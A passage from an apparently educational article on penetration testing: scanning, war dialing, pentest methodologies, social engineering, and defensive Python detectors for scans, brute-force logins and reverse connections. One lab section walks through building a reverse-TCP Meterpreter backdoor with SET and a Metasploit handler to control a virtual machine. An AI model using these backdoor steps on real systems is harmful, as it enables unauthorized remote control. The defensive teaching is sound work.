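                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return server.getsockname()[1]


if __name__ == "__main__":
    open_port = start_fake_smtp()
    # Sweep a small range around the listener: one open port, the rest refused.
    for port, banner, product, version in scan("127.0.0.1", range(open_port - 2, open_port + 3)):
        print(f"{port}/tcp open  {product} {version}  ({banner})")
```

The defensive reading of the same code is the point the text makes about version strings: a banner that reveals "Sendmail 8.6" tells the attacker exactly which published vulnerabilities to try. Most daemons let the administrator replace or trim the greeting, and the scan is the quickest way to verify that it was actually done on every exposed service.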

Phone number attack
Over the past decade modems have revolutionized computer communications. But those same modems, when installed on networked computers and left in auto-answer mode, are the most vulnerable points. A phone number attack (war dialing) is a sweep of all number combinations in search of a modem's answer tone.
A program running in automatic mode can work through a huge range of telephone numbers overnight, recording the modems it detects. Over his morning coffee the hacker receives a text file of modem numbers and can attack them. What makes this attack particularly dangerous is that many companies allow themselves uncontrolled or unauthorized communication lines that bypass the firewalls with the Internet and give direct access to the internal network.
The same attack can be carried out as a test; the results show how many modems are open to a real attack. This type of testing is quite simple. In a blind test the penetration team finds the company's telephone exchanges (from various open sources, including its web page); if the test is not blind, this information is given to them. A range of telephone numbers on the exchanges is dialled automatically to determine which numbers have modems attached. Modem attack methods can rely on terminal programs such as HyperTerminal and remote-control programs such as pcAnywhere. Again, the goal is to gain some level of access to a device on the internal network. If a connection and a successful login occur, a new game begins.

From all that has been said, one conclusion can apparently be drawn: network security can be maintained in-house, but it must be a highly professional activity, not a one-off campaign. An enterprise-wide network is almost always a large system, and all its security problems cannot be solved in one fell swoop.

Leaving aside national computer security laws and standards, three types of information source can be recommended as the most useful and necessary in practice:

  • the relevant sections of the documentation for the operating systems and applications in use;

  • the web pages of the manufacturers of software products and operating systems, where announcements of new versions with bug fixes and patches are published;

  • at least two organizations, CERT (Computer Emergency Response Team) and CIAC (Computer Incident Advisory Capability), which collect and disseminate information about break-ins, give advice on eliminating their consequences, and report detected software errors through which attackers penetrate computer systems.

Just as necessary a condition for reliable protection is a systematic approach, and every system has its own life cycle. For a security system it is: design, implementation, evaluation, update.

Penetration testing (jargon: pentest) is a method of assessing the security of computer systems or networks by simulating an attack by an intruder. The process includes active analysis of the system for potential vulnerabilities that could cause the target system to malfunction or cause a complete denial of service. The analysis is conducted from the perspective of a potential attacker and may include active exploitation of the system's vulnerabilities.

The objects of testing can be individual information systems, for example a CMS (content management system), a CRM (customer relationship management system) or an Internet client-bank, or the entire infrastructure: the network perimeter, the wireless network, the internal or corporate network, as well as the external perimeter.

The task of penetration testing is to search for all possible known software vulnerabilities, password policy flaws, and flaws and subtleties in the configuration of the information system. During such a test the tester stages a pseudo-attack on the corporate network, imitating the actions of real intruders or an attack carried out by malicious software without the tester's direct participation. The purpose is to identify weaknesses in the protection of the corporate network against such attacks and to eliminate the vulnerabilities found during the pseudo-attacks.

Penetration testing is usually divided into BlackBox, WhiteBox and GreyBox:

BlackBox. The specialist has only publicly available information about the object of study, its network and parameters. This option is as close as possible to the real situation. As initial data the tester is given only the name of the company or its website; all other information, such as the IP addresses used by the company, its websites and the Internet exit points of its offices and branches, the tester has to find out on his own.

WhiteBox. The complete opposite of BlackBox: the specialist is given the maximum information he needs, up to administrative access to any server. This method allows the most complete study of the object's vulnerabilities. With WhiteBox the tester does not have to spend time collecting information, mapping the network and other preliminary work, and the testing itself also takes less time, because some checks simply do not have to be done. The advantage of this method is its fuller and more integrated approach to the study; the downside is that it is less like a real attack by an intruder.

GreyBox. A middle option between WhiteBox and BlackBox: the tester works as in BlackBox and periodically requests information about the system under test in order to reduce research time or apply his efforts more efficiently. This option is the most popular, since it allows testing without spending too much time collecting information, leaving more time to search for vulnerabilities, while remaining close enough to the real situation of an attacker.

1. FEATURES OF PENETRATION ON A REMOTE COMPUTER SYSTEM.

Any objective and complete penetration testing has a number of features and must be carried out taking into account the recommendations and rules.

The rules and framework for informational penetration testing are presented in the OSSTMM and OWASP methodologies. Subsequently, the obtained data can be easily adapted to assess compliance with any industry standards and "best world practices", such as Cobit, ISO/IEC 2700x series standards, CIS/SANS/NIST/etc recommendations and PCI DSS standard.

Technological data alone will not be sufficient to carry out such an assessment in its entirety. A full assessment requires interviewing employees of various departments of the company being assessed, analysis of administrative documentation, various processes information technologies(IT) and information security(IB) and much more.

As for penetration testing in accordance with the requirements of the payment card industry information security standard (PCI DSS), it does not differ much from ordinary testing conducted using the OSSTMM and OWASP methodologies. Moreover, the PCI DSS standard recommends adhering to the OWASP rules both when conducting a pentest (ASV) and an audit (QSA).

The main differences between PCI DSS testing and penetration testing in the broad sense of the word are as follows:

  • The standard does not regulate (and therefore does not require) attacks using social engineering.
  • All checks carried out should minimize the threat of Denial of Service (DoS) as much as possible. Therefore, the testing should be carried out using the "gray box" method, with mandatory advance warning to the administrators of the relevant systems.
  • The main purpose of such testing is an attempt to gain unauthorized access to payment card data (PAN, Cardholder Name, etc.).

The GrayBox method reduces the risk of denial of service when carrying out such work against information resources that operate 24/7.

In general, PCI penetration testing must meet the following criteria:

  • Clause 11.1(b) - Wireless network security analysis
  • Clause 11.2 - Scanning the information network for vulnerabilities (ASV)
  • Clause 11.3.1 - Network-layer penetration tests
  • Clause 11.3.2 - Application-layer penetration tests

Determining the boundaries of the study. First of all, it is necessary to define the boundaries of the penetration test and to determine and agree on the sequence of actions to be performed. In the best case, a network map can be obtained from the information security department, schematically showing how the processing center interacts with the overall infrastructure. In the worst case, you will have to talk to a system administrator who knows his own shortcomings, and obtaining comprehensive data about the information system will be hampered by his reluctance to share his IP data. One way or another, to conduct a PCI DSS penetration test you need to obtain at least the following information:

  • network segmentation (user, technological, DMZ, processing, etc.);
  • firewalls at subnet boundaries (ACL rules / firewall);
  • the web applications and DBMS in use (both test and production);
  • the wireless networks in use;
  • any security details that need to be taken into account during the survey (for example, blocking of accounts after N incorrect authentication attempts), infrastructure features and general wishes regarding the testing.

2. STAGES OF PENETRATION TESTING

Consider the possible stages of penetration testing. Depending on the information available (BlackBox / WhiteBox / GreyBox), the sequence of actions may differ: data collection, network scanning, hacking the system, malicious software, social engineering.

2.1 Collection of data.

Collection of data from open sources. Open sources are sources of information that can be accessed legally, on lawful grounds. Searching for the necessary information in open sources has been adopted by many civilian and military structures working in the field of intelligence and industrial espionage.

Access to the necessary information on the Internet can be obtained in various ways: via hyperlinks, by searching various directories (websites, blogs, etc.), or by viewing search results. For certain purposes, it is impossible to do without searching specialized databases.

Information can also be obtained from the site's internal URLs, e-mail addresses, telephone and fax numbers, DNS servers, the IP address range and routing information.

With the development of the Internet, WHOIS services have become widespread. Whois (from the English "who is") is a network protocol based on TCP. Its main purpose is to obtain information about the "registrant" (the domain owner) and the "registrar" (the organization that registered the domain), the names of the DNS servers, the registration date and the expiration date. Records about IP addresses are grouped into ranges (for example, 8.8.8.0 - 8.8.8.255) and contain information about the organization to which the range is delegated.
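The WHOIS record fields named above (registrar, registrant, name servers, expiry date, and RIR-style IP ranges) are returned as plain "Key: value" lines. The following is an added example, not code from the article, that parses such a reply and performs the two checks a defender usually wants from it: how many days remain until the domain expires (an expired domain can be re-registered by someone else) and whether an IP address seen in logs falls inside a delegated range. The WHOIS text and the organization names in it are constructed placeholder data, not real registry output.

```python
"""Parse a WHOIS reply and check expiry / IP-range membership.

Added example (not the article's code). SAMPLE_WHOIS and SAMPLE_INETNUM are
constructed placeholder records; the parser handles the common "Key: value"
format that domain registries and RIRs return over TCP port 43.
"""
import ipaddress
from datetime import datetime, timezone

# Constructed domain record (placeholder values, not a real lookup).
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE-CORP.TEST
Registrar: Example Registrar Ltd
Registrant Organization: Example Corp
Name Server: NS1.EXAMPLE-CORP.TEST
Name Server: NS2.EXAMPLE-CORP.TEST
Creation Date: 2015-03-01T00:00:00Z
Registry Expiry Date: 2025-03-01T00:00:00Z
>>> Last update of whois database: 2024-01-15T10:00:00Z <<<
"""

# Constructed RIR-style record for the range quoted in the text above.
SAMPLE_INETNUM = """\
inetnum:        8.8.8.0 - 8.8.8.255
netname:        EXAMPLE-NET
org:            ORG-EXAMPLE
country:        ZZ
"""


def parse_whois(text: str) -> dict[str, list[str]]:
    """Turn 'Key: value' lines into a dict of lowercase key -> list of values.
    Repeated keys (e.g. several Name Server lines) accumulate; comment lines
    starting with '%', '#' or '>>>' are skipped."""
    record: dict[str, list[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        record.setdefault(key.strip().lower(), []).append(value.strip())
    return record


def days_until_expiry(record: dict[str, list[str]], now: datetime):
    """Days from `now` to the registry expiry date, or None if not present."""
    raw = record.get("registry expiry date") or record.get("expiry date")
    if not raw:
        return None
    expiry = datetime.fromisoformat(raw[0].replace("Z", "+00:00"))
    return (expiry - now).days


def ip_in_range(ip: str, range_spec: str) -> bool:
    """range_spec is either 'a.b.c.d - w.x.y.z' (inetnum style) or CIDR."""
    addr = ipaddress.ip_address(ip)
    if "-" in range_spec:
        low, high = (ipaddress.ip_address(p.strip()) for p in range_spec.split("-", 1))
        return low <= addr <= high
    return addr in ipaddress.ip_network(range_spec, strict=False)


def whois_report(text: str, now: datetime, warn_days: int = 30) -> dict:
    """Summarize the fields the text above lists, flagging imminent expiry."""
    rec = parse_whois(text)
    days = days_until_expiry(rec, now)
    return {
        "registrar": rec.get("registrar", [None])[0],
        "registrant": rec.get("registrant organization", [None])[0],
        "name_servers": rec.get("name server", []),
        "days_to_expiry": days,
        "expiring_soon": days is not None and days <= warn_days,
    }


if __name__ == "__main__":
    print(whois_report(SAMPLE_WHOIS, datetime.now(timezone.utc)))
    rng = parse_whois(SAMPLE_INETNUM)["inetnum"][0]
    print(rng, ip_in_range("8.8.8.8", rng), ip_in_range("8.8.9.1", rng))
```

Registries differ in field names ("Registry Expiry Date" versus "Expiry Date", for example), which is why the lookup tries more than one key; extend the key list for the registries you actually query.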

2.2 Network scanning.

Network scanning can be divided into components:

1. Scanning a range of IP addresses to determine "live" hosts

2. Scanning ports

3. Discovery of services and their versions

4. Scan to determine the OS

5. Vulnerability Scanning

1. Scanning a range of IP addresses.

A fundamental task in exploring any network is to reduce the set of IP ranges to a list of active hosts. Scanning every port of every IP address is slow and unnecessary. Which hosts are of interest is largely determined by the goals of the scan. While an administrator's task of discovering live hosts on a network can be accomplished with a simple ICMP ping, people testing the network's ability to withstand attacks from outside need to use a variety of probe sets to get past the firewall.

The task of discovering hosts is sometimes referred to as a ping scan, but it goes far beyond the usual ICMP echo requests sent by the ubiquitous ping tools. It is preferable to scan the network using arbitrary combinations of multi-port TCP SYN/ACK, UDP and ICMP requests. The purpose of all these requests is to receive responses indicating that the IP address is currently active (in use by a host or network device). On most networks, only a small percentage of IP addresses are active at any given time. This is especially true for address spaces like 10.0.0.0/8. Such networks have 16 million IP addresses, but they are sometimes used by companies with no more than a thousand machines. The host discovery function can find these machines in this vast sea of IP addresses.

2. Scanning ports.

There are many different port scanning techniques, and the appropriate one (or a combination of several) is chosen for the specific task. Consider the most popular scanning techniques:

TCP SYN scan
SYN scanning is the default and most popular scan type. It can be launched quickly, it is capable of scanning thousands of ports per second on a fast connection, and it is not hindered by restrictive firewalls.

Various types of UDP scanning
While most Internet services use the TCP protocol, UDP services are also widely used. The three most popular are DNS, SNMP and DHCP (ports 53, 161/162 and 67/68). Because UDP scanning is generally slower and more complex than TCP scanning, many security professionals ignore these ports. This is a mistake, because there are UDP services that are exploited by attackers.

TCP NULL, FIN and Xmas scans
These three types of scan use a subtle loophole in the TCP RFC to separate open and closed ports.

TCP ACK scan
This type of scan differs from all the others in that it cannot detect an open port. It is used to identify firewall rules, to find out whether they are stateful or not, and to determine which ports they filter.
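Each of the techniques above leaves a characteristic TCP flag pattern (SYN only, no flags at all, FIN only, FIN+PSH+URG, ACK only) spread over many destination ports from one source, which is what a defender looks for in firewall or packet logs. The following is an added example, not part of the article, that classifies probes by their flags and raises an alert when one source touches an unusually large number of distinct ports with the same probe type. The log line format and all addresses are constructed for the example (documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24); adapt the regular expression to your own firewall's log format.

```python
"""Classify TCP probes by flag pattern and flag sources that sweep many ports.

Added example (not the article's code). Log lines are a constructed
'src= dst= dport= flags=' format using tcpdump-style flag letters
(S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST); an empty flags field is a NULL probe.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) flags=(?P<flags>[A-Z]*)"
)


def classify_probe(flags: str) -> str:
    """Map a flag string to the scan technique that produces it."""
    f = set(flags)
    if f == {"S"}:
        return "syn"          # SYN scan (also the first packet of any real connection)
    if not f:
        return "null"         # NULL scan: no flags set
    if f == {"F"}:
        return "fin"          # FIN scan
    if f == {"F", "P", "U"}:
        return "xmas"         # Xmas scan: FIN+PSH+URG "lit up"
    if f == {"A"}:
        return "ack"          # ACK scan: firewall rule mapping, not port state
    return "other"            # normal mid-connection traffic (PA, FA, R, ...)


def detect_scans(lines, threshold: int = 10):
    """Return alerts for sources touching >= threshold distinct (dst, port)
    pairs with one probe type. Legitimate clients send SYNs too, so the
    threshold, not the SYN itself, is what separates a scan from normal use."""
    touched = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        kind = classify_probe(m["flags"])
        if kind == "other":
            continue
        touched[m["src"]][kind].add((m["dst"], int(m["dport"])))
    alerts = []
    for src, kinds in touched.items():
        for kind, targets in kinds.items():
            if len(targets) >= threshold:
                alerts.append({"src": src, "technique": kind, "targets": len(targets)})
    return sorted(alerts, key=lambda a: (a["src"], a["technique"]))


def build_sample_log():
    """Constructed log: one SYN sweep, one Xmas sweep, one benign client."""
    lines = [f"src=203.0.113.5 dst=192.0.2.10 dport={p} flags=S" for p in range(1, 26)]
    for p in (21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389):
        lines.append(f"src=198.51.100.7 dst=192.0.2.10 dport={p} flags=FPU")
    lines += [
        "src=192.0.2.50 dst=192.0.2.10 dport=443 flags=S",
        "src=192.0.2.50 dst=192.0.2.10 dport=443 flags=A",
        "src=192.0.2.50 dst=192.0.2.10 dport=443 flags=PA",
        "src=192.0.2.50 dst=192.0.2.10 dport=80 flags=S",
    ]
    return lines


if __name__ == "__main__":
    for alert in detect_scans(build_sample_log()):
        print(alert)
```

Note that a NULL, FIN or Xmas probe never occurs in a legitimate connection, so for those three techniques a much lower threshold (even a single packet) is justified; the SYN and ACK cases need the distinct-port count to avoid alerting on ordinary clients.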

3. Discovery of services and their versions.

Scanning a remote system may reveal that ports 25/tcp, 80/tcp and 53/udp are open. From this information you can conclude that these ports probably correspond to a mail server (SMTP), a web server (HTTP) and a domain name server (DNS) respectively. This is usually correct, because the vast majority of services using TCP port 25 are in fact mail servers. However, you should not rely entirely on this information: people can and do run services on non-standard ports.

After open TCP and/or UDP ports have been detected, they are probed to determine which applications (services) use them. Using a database of probes for various services and the corresponding expressions for recognizing and parsing the responses, you can determine the service protocol (e.g. FTP, SSH, Telnet, HTTP), the application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), the version number, the hostname, the device type (e.g. printer, router), the OS family (e.g. Windows, Linux) and sometimes various details such as whether it is possible to connect to the X server, the SSH protocol version, or a username.
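The probe-and-match process just described comes down to a table of regular expressions applied to what a service sends back. The following is an added example, not the article's code, showing that matching for a few banner formats (SSH, FTP, SMTP and HTTP) and the OS hint that some banners leak. The banners are constructed samples; the product names are real software, the version numbers in the samples are made up. From the defender's side the same matcher is useful for inventorying which of your own services disclose product and version strings.

```python
"""Minimal banner-to-service matcher in the style the text describes.

Added example (not the article's code). Banners below are constructed
samples; the regexes cover a handful of common formats only.
"""
import re

# (protocol, regex with named groups product/version and, for SSH, proto)
PROBE_SIGNATURES = [
    ("ssh", re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<product>[A-Za-z]+)_(?P<version>[\w.]+)")),
    ("smtp", re.compile(r"^220 (?P<host>\S+) ESMTP (?P<product>Postfix|Exim|Sendmail)(?: (?P<version>[\w.]+))?")),
    ("ftp", re.compile(r"^220[ -].*?(?P<product>vsFTPd|ProFTPD|Pure-FTPd) (?P<version>[\w.]+)")),
    ("http", re.compile(r"^HTTP/[\d.]+ \d{3}.*?\r?\nServer: (?P<product>[\w-]+)(?:/(?P<version>[\w.]+))?", re.S)),
]

# Substrings that reveal the OS family even when the port itself does not.
OS_HINTS = [("Ubuntu", "Linux (Ubuntu)"), ("Debian", "Linux (Debian)"),
            ("Win64", "Windows"), ("Win32", "Windows")]


def identify_service(banner: str):
    """Return protocol/product/version/os_hint for a banner, or None."""
    for protocol, rx in PROBE_SIGNATURES:
        m = rx.match(banner)
        if not m:
            continue
        gd = m.groupdict()
        os_hint = next((hint for needle, hint in OS_HINTS if needle in banner), None)
        info = {"protocol": protocol, "product": gd.get("product"),
                "version": gd.get("version"), "os_hint": os_hint}
        if gd.get("proto"):
            info["ssh_protocol"] = gd["proto"]   # the "SSH protocol version" detail
        return info
    return None


# Constructed banners (made-up versions) for demonstration.
SAMPLE_BANNERS = {
    22: "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4",
    21: "220 (vsFTPd 3.0.3)",
    25: "220 mail.example-corp.test ESMTP Postfix",
    80: "HTTP/1.1 200 OK\r\nServer: Apache/2.4.57 (Win64)\r\nContent-Length: 0\r\n\r\n",
    9999: "hello?",
}


def inventory(banners: dict) -> dict:
    """Map port -> identification for every banner that matched."""
    return {port: info for port, b in banners.items() if (info := identify_service(b))}


if __name__ == "__main__":
    for port, info in inventory(SAMPLE_BANNERS).items():
        print(port, info)
```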

4. Scan to determine the OS.

It is possible to determine the OS on a remote system based on an analysis of the operation of the TCP/IP stack. A series of TCP and UDP packets are sent to a remote host and virtually every bit in the response is examined. After conducting many tests such as TCP ISN sampling, TCP option support, IP ID sampling, and analyzing the duration of the initialization procedure, the results are compared with a database containing known sets of typical results for various OSes and, if matches are found, a conclusion can be made about the installed OS.

5. Vulnerability scanning.

Vulnerability scanning is a fully or partially automated process of collecting information about the availability of a node of an information network (personal computers, servers, telecommunications equipment), identifying the network services and applications used on that node and the ports used by those services and applications, in order to determine existing or possible vulnerabilities.

2.3 Hacking the system.

The success of implementing one or another hacking algorithm in practice largely depends on the architecture and configuration of the particular operating system that is the object of this hacking.

However, there are approaches to which almost any operating system can be subjected:

  1. Password theft.
  2. Watching the user at the moment he enters the password that grants the right to work with the operating system.
  3. Getting the password from a file in which the user saved it.
  4. Finding a password that the user wrote down on paper, as users often do.
  5. Theft of external media containing password information (a diskette or electronic key that stores the user's password for entering the operating system).
  6. Full enumeration of all possible passwords.
  7. Password guessing based on the frequency of occurrence of characters and bigrams, using personal dictionaries and the most commonly used passwords.
  8. Scanning the computer's hard drives.
  9. Garbage collection.
  10. Excess of authority (using errors in the software or in the administration of the operating system, the researcher obtains authority that exceeds what is granted to him under the current security policy).
  11. Launching a program as a user with the necessary permissions, or as a system program (driver, service, daemon, etc.).
  12. Replacing a dynamically loaded library used by system programs, or changing the environment variables that describe the path to such libraries.
  13. Modifying the code or data of the operating system's own security subsystem.
  14. Denial of service (the purpose of this attack is to partially or completely disable the operating system).
  15. Capturing resources (the controlled program grabs all the resources available in the operating system and then enters an infinite loop).
  16. Request bombardment (a controlled program constantly sends requests to the operating system whose handling requires significant computing resources).
  17. Exploiting bugs in software or administration.
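Items 6 and 7 (full enumeration and dictionary-based guessing) are the approaches an authentication log can reveal, and the "blocking of accounts after N incorrect authentication attempts" mentioned earlier as a security detail is the control they run into. The following is an added example, not the article's code, that reads sshd-style failure lines and distinguishes the two patterns a defender cares about: many failures against one account from one source (brute force, which lockout stops) and one or two failures against many accounts from one source (password spraying, which slips under a per-account lockout). The log lines, hostnames and addresses are constructed for the example.

```python
"""Detect brute-force and password-spray patterns in sshd-style auth logs.

Added example (not the article's code). Log lines are constructed in the
OpenSSH 'Failed password for <user> from <ip>' format; thresholds are
illustrative and should be tuned to the environment.
"""
import re
from collections import defaultdict

FAIL_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")


def detect_auth_abuse(lines, brute_threshold: int = 5, spray_users: int = 5):
    """Per source: >= brute_threshold failures on one account -> brute_force;
    >= spray_users distinct accounts each below the threshold -> password_spray."""
    per_src = defaultdict(lambda: defaultdict(int))   # src -> user -> failures
    for line in lines:
        m = FAIL_RE.search(line)
        if m:
            per_src[m["src"]][m["user"]] += 1

    alerts = []
    for src, users in per_src.items():
        for user, n in users.items():
            if n >= brute_threshold:
                alerts.append({"kind": "brute_force", "src": src, "user": user, "count": n})
        # Spraying keeps every account under the lockout limit on purpose,
        # so it is only visible when counting distinct accounts per source.
        if len(users) >= spray_users and max(users.values()) < brute_threshold:
            alerts.append({"kind": "password_spray", "src": src, "user": None,
                           "count": len(users)})
    return sorted(alerts, key=lambda a: (a["kind"], a["src"], a["user"] or ""))


def build_sample_auth_log():
    """Constructed log: one brute-force source, one spraying source, one
    legitimate user who mistyped twice and then succeeded."""
    lines = [
        f"Jan 15 10:00:{i:02d} bastion sshd[2211]: Failed password for admin "
        f"from 203.0.113.9 port {51000 + i} ssh2"
        for i in range(8)
    ]
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        lines.append(
            f"Jan 15 10:10:{i:02d} bastion sshd[2212]: Failed password for {user} "
            f"from 198.51.100.22 port {52000 + i} ssh2"
        )
    lines += [
        "Jan 15 10:20:00 bastion sshd[2213]: Failed password for alice from 192.0.2.50 port 53000 ssh2",
        "Jan 15 10:20:05 bastion sshd[2213]: Failed password for alice from 192.0.2.50 port 53001 ssh2",
        "Jan 15 10:20:09 bastion sshd[2213]: Accepted password for alice from 192.0.2.50 port 53002 ssh2",
    ]
    return lines


if __name__ == "__main__":
    for alert in detect_auth_abuse(build_sample_auth_log()):
        print(alert)
```

A per-account lockout set at `brute_threshold` would stop the first source but not the second, which is why the spray rule keys on the number of distinct accounts per source rather than on failures per account.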

2.4 Malicious software.

Very often, malware is used to gain access to a system. Typically, malware with backdoor functionality is posted on a file-sharing resource under the guise of a legitimate program.

Malicious software is software developed to gain unauthorized access to a computer's computing resources and to the data stored on it. Such programs are designed to harm the owner of the information or of the computer by copying, distorting, deleting or substituting information.

Trojans are malicious programs that perform actions that are not authorized by the user. Such actions may include:

  1. Deleting data
  2. Blocking data
  3. Modifying data
  4. Copying data
  5. Slowing down computers and computer networks.

Trojans are classified according to the type of actions they perform on a computer.

  1. Backdoors. A backdoor Trojan gives attackers the ability to remotely control infected computers. Such programs allow the author to perform any action on the infected computer, including sending, receiving, opening and deleting files, displaying data, and restarting the computer. Backdoor Trojans are often used to combine a group of victim computers into a botnet or zombie network for criminal purposes.
  2. Exploits. Exploits are programs containing data or code that take advantage of a vulnerability in applications running on a computer.
  3. Rootkits. Rootkits are programs designed to hide certain objects or actions in the system. Often their main purpose is to prevent antivirus software from detecting malware, in order to extend the time these programs run on the infected computer.

2.5 Social engineering.

Social engineering is used to get the malware onto the attacked system. Social engineering is a method of unauthorized access to information resources based on the characteristics of human psychology. The main goal of social engineers is to gain access to protected systems in order to steal information, passwords, credit card data and so on. The object of the attack is not the machine but its operator. Therefore, all social engineering methods and techniques are based on exploiting the weaknesses of the human factor.

There are several common techniques and types of attack that social engineers use. The common feature of all these methods is deception, intended to make a person perform some action that is of no benefit to him but is necessary to the social engineer. To achieve the desired result, a social engineer uses a number of tactics: impersonating another person, distracting attention, creating psychological pressure, etc. The ultimate goals of the deception can also be very diverse.

Social engineering techniques:

  • Pretexting. Pretexting is a set of actions carried out according to a certain pre-prepared scenario (pretext).
  • Phishing. Phishing (from the English "fishing") is a type of Internet fraud whose purpose is to gain access to confidential user data: logins and passwords. The purpose of phishing is to obtain confidential information illegally.
  • Quid pro quo. Quid pro quo (Latin, "this for that"); in English the expression is usually used in the sense of "a favour for a favour". Often the social engineer poses as a technical support employee who reports technical problems at the employee's workplace and offers help in eliminating them.

A 2003 study by the Information Security Program showed that 90% of office workers are willing to divulge confidential information, such as their passwords, for some kind of favor or reward.

  • Trojan horse. A Trojan is a malicious program used by hackers to collect, destroy or modify information, disrupt a computer, or use the user's resources for their own purposes. This technique often exploits the target's curiosity, affection or other emotions.

Organization of a pseudo-attack.

To organize a pseudo-attack on a computer system, the Social Engineering Toolkit (SET) and the Metasploit Framework (MSF) are used. These utilities are included by default in the BackTrack 5 distribution, which is designed to test the possibility of hacking systems and networks. We also use two virtual machines running the operating systems Windows 7 and BackTrack 5.

Backdoor generation. We will use SET to create a reverse TCP backdoor, and MSF to create a handler that processes packets from the created backdoor and maintains a communication channel between the potential attacker and the system on which the backdoor is launched.

All actions are performed in console mode on BackTrack 5. The payload is created through the SET utility, item 4 "Create a Payload and Listener".

The payload with reverse TCP (to establish the return connection) is created by selecting item 2 "Windows Reverse_TCP Meterpreter" and then item 16 "Backdoored Executable". This completes the creation of the backdoor. During creation you also specify the port number through which the return connection will be made. The file msf.exe is generated in the folder /pentest/exploits/SET according to the options selected.

Exploit setup. The exploit handler is designed to receive TCP connections from the created backdoor. It is configured by launching MSF and selecting the handler (listener): use exploit/multi/handler.

As a result, MSF switches to the context of the exploit handler. The next task is to configure the payload for this exploit. Since the backdoor was created with the Reverse_TCP Meterpreter, information is exchanged over a TCP connection: set payload windows/meterpreter/reverse_tcp. In addition, the local host (LHOST, the IP address of the potential attacker) must be specified in the options.

Running the handler leads to the meterpreter context, where the sessions to which you can connect are shown. A session appears after the backdoor is launched on the remote machine, which in practice is sometimes achieved through social engineering.

To simulate this process, the backdoor is launched on the second virtual machine. After that, a session to this system becomes available in meterpreter; that is, our backdoor provides a communication channel, and we gain control over the infected machine.
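Seen from the Windows 7 side of the lab above, the backdoor is an executable dropped in a user-writable location that opens an outbound TCP connection from a workstation to an external address on an unusual port and keeps it open for as long as the session lasts. The following is an added example, not the article's code, that scores connection records from an endpoint or flow sensor against exactly those three indicators and alerts when at least two coincide, so that a browser's long HTTPS session or a freshly downloaded installer fetching updates does not trigger by itself. The record format, hosts, paths, the remote port 4444 and all addresses are constructed for the example; 192.0.2.0/24 is treated as the lab's internal range.

```python
"""Flag long-lived outbound connections that look like a reverse-TCP backdoor.

Added example (not the article's code). Records are a constructed
'host= proc= raddr= duration=' format; INTERNAL includes the documentation
range 192.0.2.0/24 to stand in for the lab LAN.
"""
import ipaddress
import re

INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "192.0.2.0/24")]
# Ports a workstation is normally allowed to reach on the Internet (illustrative).
ALLOWED_EGRESS_PORTS = {25, 53, 80, 123, 443, 587, 993}
# Directories an ordinary user can write to; a binary running from here was
# not installed by an administrator.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\downloads\\", "\\appdata\\")
LONG_LIVED_SECONDS = 600

REC_RE = re.compile(
    r"host=(?P<host>\S+) proc=(?P<proc>.+?) raddr=(?P<rip>[\d.]+):(?P<rport>\d+) duration=(?P<dur>\d+)"
)


def score_connection(rec: dict) -> list:
    """Return the list of indicators a single connection record triggers."""
    rip = ipaddress.ip_address(rec["rip"])
    if any(rip in net for net in INTERNAL):
        return []   # internal traffic is outside this heuristic's scope
    reasons = []
    if int(rec["rport"]) not in ALLOWED_EGRESS_PORTS:
        reasons.append("unusual_egress_port")
    if any(d in rec["proc"].lower() for d in USER_WRITABLE):
        reasons.append("user_writable_binary")
    if int(rec["dur"]) >= LONG_LIVED_SECONDS:
        reasons.append("long_lived")
    return reasons


def detect_reverse_connections(records, min_indicators: int = 2):
    """Parse records and alert on those with >= min_indicators indicators."""
    alerts = []
    for line in records:
        m = REC_RE.search(line)
        if not m:
            continue
        rec = m.groupdict()
        reasons = score_connection(rec)
        if len(reasons) >= min_indicators:
            alerts.append({"host": rec["host"], "proc": rec["proc"],
                           "remote": f'{rec["rip"]}:{rec["rport"]}', "reasons": reasons})
    return alerts


# Constructed records: a backdoor-like session, a browser, an installer, RDP.
SAMPLE_RECORDS = [
    r"ts=2024-01-15T10:02:11 host=WS-01 proc=C:\Users\bob\Downloads\msf.exe raddr=203.0.113.77:4444 duration=1820",
    r"ts=2024-01-15T10:03:40 host=WS-01 proc=C:\Program Files\Browser\browser.exe raddr=203.0.113.10:443 duration=900",
    r"ts=2024-01-15T10:05:02 host=WS-02 proc=C:\Users\ann\Downloads\setup.exe raddr=203.0.113.20:443 duration=5",
    r"ts=2024-01-15T10:06:15 host=WS-02 proc=C:\Windows\System32\mstsc.exe raddr=192.0.2.5:3389 duration=3600",
]

if __name__ == "__main__":
    for alert in detect_reverse_connections(SAMPLE_RECORDS):
        print(alert)
```

The same three indicators are what an egress firewall policy removes in advance: denying workstation traffic to non-allowlisted ports makes the handler unreachable regardless of how the executable arrived.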

Internet security

Each user, be it an individual or an enterprise, necessarily has information that is unique from his point of view. An enterprise can be both a commercial structure and a state, municipal or budgetary institution, but in all cases its activities are somehow supported by a computer network. And the need to ensure the information security of a computer network is beyond doubt.

Sources of threats and possible consequences

